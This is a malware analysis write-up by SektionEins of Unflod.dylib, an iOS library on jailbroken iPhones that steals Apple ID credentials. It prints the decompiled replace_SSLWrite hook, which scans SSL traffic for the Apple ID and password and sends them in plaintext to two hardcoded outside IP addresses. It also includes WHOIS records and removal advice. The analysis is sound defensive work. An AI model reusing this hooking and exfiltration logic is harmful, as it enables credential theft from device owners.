iOS Malware Campaign "Unflod Baby Panda"

SektionEins did a quick and dirty analysis of Unfold.dylib which is part of an iOS malware campaign targetting jailbroken iPhones.

/images/BABYPANDA_SMALL.png

Introduction

On 17th April 2014 a malware campaign targetting users of jailbroken iPhones has been discovered and discussed by reddit users. This malware appears to have Chinese origin and comes as a library called Unflod.dylib that hooks into all running processes of jailbroken iDevices and listens to outgoing SSL connections. From these connections it tries to steal the device's Apple-ID and corresponding password and sends them in plaintext to servers with IP addresses in control of US hosting companies for apparently Chinese customers.

Users of reddit have made this malware available to the public, which allowed SektionEins to perform an analysis of this threat.

However so far only the malware itself has been found and until now it is unknown how it ends up on jailbroken phones. Rumours that Chinese piracy repositories are involved are so far unverified.

Meanwhile it has been discovered that framework.dylib is another name for the same threat used in other infections.

The Binary

The malware comes as a Mach-O ARMv7 dynamic library called Unflod.dylib (or framework.dylib) that is installed as MobileSubstrate extension inside the path:

/Library/MobileSubstrate/DynamicLibraries/Unflod.dylib

It has been suggested that the choice of name might have something todo with the existence of a real tweak called Unfold. The choice of name might therefore just be an attempt to hide in plain sight.

While analysing the binary SektionEins discovered that the binary itself contains strings that hint at the threat being compiled with XCode on a Mac OS X system. Infact the following string was found inside the Mach-O header as the name of the library during compilation.

/Users/apple/Library/Developer/Xcode/DerivedData/framework-guknhpkmreoccjbplfeebcklivmx/Build/Products/Debug-iphoneos/framework.app/framework

This string reveals that the project name during compilation was "framework.app" and that it was compiled by a user called "apple". Further information inside the Mach-O header seems to indicate that the binary was compiled against the iOS 6.1 SDK.

During our analysis it was also discovered that the threat is digitally signed with an iPhone developer certificate. As you can see below.

$ codesign -vvvv -d Unflod.dylib
Executable=./Unflod.dylib
Identifier=com.your.framework
Format=Mach-O thin (armv7)
CodeDirectory v=20100 size=227 flags=0x0(none) hashes=3+5 location=embedded
Hash type=sha1 size=20
CDHash=da792624675e82b3460b426f869fbe718abea3f9
Signature size=4322
Authority=iPhone Developer: WANG XIN (P5KFURM8M8)
Authority=Apple Worldwide Developer Relations Certification Authority
Authority=Apple Root CA
Signed Time=14 Feb 2014 04:32:58
Info.plist=not bound
Sealed Resources=none
Internal requirements count=2 size=484

As you can see from above the developer certificate issued by Apple is registered to a person called WANG XIN. This person might be a fake persona, the victim of certificate theft or really involved. It is impossible for us to know, but Apple should be able to investigate from this information and terminate that developer account.

Furthermore the signature date is the 14th of February of this year, which hints at this threat being around for a short while now without being discovered.

It is important to remember that this threat only affects jailbroken iPhones and therefore the signature on the binary is not required for the malware to work at all. The fact that it is still there is an oversight (or misinformation) by the attacker.

The Code

The malicious code itself is not very big. Everything is contained inside one function called replace_SSLWrite that decompiles as seen below.

int __fastcall replace_SSLWrite(int a1, char *a2, int a3, int a4)
{
  int v4; // r3@11
  int v5; // ST28_4@14
  size_t v6; // ST24_4@14
  int v7; // ST10_4@18
  size_t v8; // ST0C_4@18
  struct sockaddr v10; // [sp+40h] [bp-60h]@16
  ssize_t v11; // [sp+50h] [bp-50h]@14
  int v12; // [sp+54h] [bp-4Ch]@14
  struct sockaddr v13; // [sp+58h] [bp-48h]@12
  ssize_t v14; // [sp+68h] [bp-38h]@10
  int v15; // [sp+6Ch] [bp-34h]@10
  char *v16; // [sp+70h] [bp-30h]@7
  char *v17; // [sp+74h] [bp-2Ch]@5
  char *v18; // [sp+78h] [bp-28h]@5
  char *v19; // [sp+7Ch] [bp-24h]@2
  int v20; // [sp+80h] [bp-20h]@1
  int v21; // [sp+84h] [bp-1Ch]@1
  char *v22; // [sp+88h] [bp-18h]@1
  int v23; // [sp+8Ch] [bp-14h]@1
  int v24; // [sp+90h] [bp-10h]@11
  int v25; // [sp+94h] [bp-Ch]@1

  v25 = __stack_chk_guard;
  v23 = a1;
  v22 = a2;
  v21 = a3;
  v20 = a4;
  if ( !findhead )
  {
    v19 = strstr(v22, "/WebObjects/MZFinance.woa/wa/authenticate HTTP/1.1");
    if ( v19 )
    {
      findhead = 1;
      strcpy(content, v22);
    }
  }
  if ( findhead == 1 )
  {
    v18 = strstr(v22, "<key>appleId</key>");
    v17 = strstr(v22, "<key>password</key>");
    if ( v18 )
    {
      if ( v17 )
      {
        strcat(content, v22);
        v16 = strstr(content, "</plist>");
        if ( v16 && v16 - content <= 2040 )
          v16[8] = 0;
        v14 = 0;
        v15 = socket(2, 1, 0);
        if ( v15 < 0 )
        {
          v24 = pSSLWrite(v23, v22, v21, v20);
          goto LABEL_20;
        }
        v13.sa_family = 2;
        *(_WORD *)&v13.sa_data[0] = 0xC61Eu;
        *(_DWORD *)&v13.sa_data[2] = inet_addr("23.88.10.4");
        if ( connect(v15, &v13, 0x10u) < 0 )
        {
          close(v15);
          v24 = pSSLWrite(v23, v22, v21, v20);
          goto LABEL_20;
        }
        v5 = v15;
        v6 = strlen(content);
        v14 = write(v5, content, v6);
        v11 = 0;
        close(v15);
        v12 = socket(2, 1, 0);
        if ( v12 < 0 )
        {
          v24 = pSSLWrite(v23, v22, v21, v20);
          goto LABEL_20;
        }
        v10.sa_family = 2;
        *(_WORD *)&v10.sa_data[0] = 0xC61Eu;
        *(_DWORD *)&v10.sa_data[2] = inet_addr("23.228.204.55");
        if ( connect(v12, &v10, 0x10u) < 0 )
        {
          close(v12);
          v24 = pSSLWrite(v23, v22, v21, v20);
          goto LABEL_20;
        }
        v7 = v12;
        v8 = strlen(content);
        v11 = write(v7, content, v8);
        close(v12);
        findhead = 2;
      }
    }
  }
  v24 = pSSLWrite(v23, v22, v21, v20);
LABEL_20:
  if ( __stack_chk_guard != v25 )
    __stack_chk_fail(__stack_chk_guard, v24, v25, v4);
  return v24;
}

The malware basically hooks into SSLWrite of the Security.framework and scans the buffer for certain strings that indicate the presence of the Apple-ID and the password for it. If those are found the code attempts to connect to the IPs 23.88.10.4 and 23.228.204.55 on port 7878 to send out the stolen data in plaintext.

The IPs

At the time of writing only the first IP seems to still accept connections on port 7878. Looking up this IP in the WHOIS database reveals the following information.

NetRange:       23.88.0.0 - 23.89.255.255
CIDR:           23.88.0.0/15
OriginAS:       AS18978
NetName:        ENZUINC-US-BLK12
NetHandle:      NET-23-88-0-0-1
Parent:         NET-23-0-0-0-0
NetType:        Direct Allocation
RegDate:        2013-06-07
Updated:        2013-06-07
Ref:            http://whois.arin.net/rest/net/NET-23-88-0-0-1


OrgName:        Enzu Inc
OrgId:          ENZUI
Address:        2360 Corporate Circle
Address:        Suite 400
City:           Henderson
StateProv:      NV
PostalCode:     89074
Country:        US
RegDate:        2010-02-24
Updated:        2012-04-25
Comment:        --------------------------------
Comment:        Enzu Inc.
Comment:        2360 Corporate Circle Suite 400
Comment:        Henderson, NV 89074
Comment:        https://www.enzu.com
Comment:        --------------------------------
Comment:        Please send all Abuse, Trademark,
Comment:        Legal Compliance, and Law Enforcement
Comment:        requests to abuse@scalabledns.com
Ref:            http://whois.arin.net/rest/org/ENZUI

ReferralServer: rwhois://rwhois.scalabledns.com:4321

OrgTechHandle: NETWO3674-ARIN
OrgTechName:   Network Operations
OrgTechPhone:  +1-702-965-1615
OrgTechEmail:
OrgTechRef:    http://whois.arin.net/rest/poc/NETWO3674-ARIN

OrgAbuseHandle: ABUSE2868-ARIN
OrgAbuseName:   Abuse
OrgAbusePhone:  +1-702-965-1615
OrgAbuseEmail:
OrgAbuseRef:    http://whois.arin.net/rest/poc/ABUSE2868-ARIN

OrgNOCHandle: NETWO3674-ARIN
OrgNOCName:   Network Operations
OrgNOCPhone:  +1-702-965-1615
OrgNOCEmail:
OrgNOCRef:    http://whois.arin.net/rest/poc/NETWO3674-ARIN

== Additional Information From rwhois://rwhois.scalabledns.com:4321 ==

%rwhois V-1.5:003fff:00 rwhois.scalabledns.com (by Network Solutions, Inc. V-1.5.9.5)
Network:Class-Name:Network
Network:ID:CID-10648
Network:Auth-Area:23.88.0.0/15
Network:Network-Name:ENZUINC-23.88.10.0/25
Network:IP-Network:23.88.10.0/25
Network:IP-Network-Block:23.88.10.0 - 23.88.10.127
Network:Org-ID;I:ORG-10648
Network:Org-Name;I:ORG-10648
Network:Tech-Contact;I:CID-10648
Network:Admin-Contact;I:CID-10648
Network:Create:20120425
Network:Update:20140401
Network:UpdatedBy:

Network:Class-Name:Network
Network:ID:CID-6853
Network:Auth-Area:23.88.0.0/15
Network:Network-Name:ENZUINC-23.88.10.0/24
Network:IP-Network:23.88.10.0/24
Network:IP-Network-Block:23.88.10.0 - 23.88.10.255
Network:Org-ID;I:ORG-6853
Network:Org-Name;I:ORG-6853
Network:Tech-Contact;I:CID-6853
Network:Admin-Contact;I:CID-6853
Network:Create:20120425
Network:Update:20130919
Network:UpdatedBy:

The second IP that no longer seems to accept connections on port 7878 reveals the following information.

NetRange:       23.228.192.0 - 23.228.255.255
CIDR:           23.228.192.0/18
OriginAS:       AS40676
NetName:        PSYCHZ-NETWORKS
NetHandle:      NET-23-228-192-0-1
Parent:         NET-23-0-0-0-0
NetType:        Direct Allocation
RegDate:        2013-09-19
Updated:        2013-09-19
Ref:            http://whois.arin.net/rest/net/NET-23-228-192-0-1

OrgName:        Psychz Networks
OrgId:          PS-184
Address:        20687-2 Amar Road #312
City:           Walnut
StateProv:      CA
PostalCode:     91789
Country:        US
RegDate:        2013-04-17
Updated:        2013-09-05
Ref:            http://whois.arin.net/rest/org/PS-184

ReferralServer: rwhois://rwhois.psychz.net:4321

OrgAbuseHandle: NOC3077-ARIN
OrgAbuseName:   NOC
OrgAbusePhone:  +1-626-549-2801
OrgAbuseEmail:
OrgAbuseRef:    http://whois.arin.net/rest/poc/NOC3077-ARIN

OrgTechHandle: NOC3077-ARIN
OrgTechName:   NOC
OrgTechPhone:  +1-626-549-2801
OrgTechEmail:
OrgTechRef:    http://whois.arin.net/rest/poc/NOC3077-ARIN

== Additional Information From rwhois://rwhois.psychz.net:4321 ==

%rwhois V-1.0,V-1.5:00090h:00 portal.psychz.net (Ubersmith RWhois Server V-2.4.0)
autharea=23.228.192.0/18
xautharea=23.228.192.0/18
network:Class-Name:network
network:Auth-Area:23.228.192.0/18
network:ID:NET-16983.23.228.204.0/25
network:Network-Name:23.228.204.0/25
network:IP-Network:23.228.204.0/25
network:IP-Network-Block:23.228.204.0 - 23.228.204.127
network:Org-Name:znznet
network:Street-Address:辽宁沈阳和平区5-1-1
network:City:沈阳
network:State:辽宁
network:Postal-Code:
network:Country-Code:CN
network:Tech-Contact:MAINT-16983.23.228.204.0/25
network:Created:20131205052358000
network:Updated:20131205052358000
network:Updated-By:
contact:POC-Name:Network Administrator
contact:POC-Email:
contact:POC-Phone:
contact:Tech-Name:Network Administrator
contact:Tech-Email:
contact:Tech-Phone:

As you can see at least the second IP has some connection to China.

Removal

Currently the jailbreak community believes that deleting the Unflod.dylib/framework.dylib binary and changing the apple-id's password afterwards is enough to recover from this attack. However it is still unknown how the dynamic library ends up on the device in the first place and therefore it is also unknown if it comes with additional malware gifts.

We therefore believe that the only safe way of removal is a full restore, which means the removal and loss of the jailbreak.

Final Words

As you can see this is a quick and dirty analysis of the threat that shows several indicators that a chinese party is involved. It is however unclear at the moment how the actual malware binaries end up on jailbroken iPhones.

If you have further information about this threat that you would like to share with us or want to enquire about our services don't hesitate to contact us at info@sektioneins.de.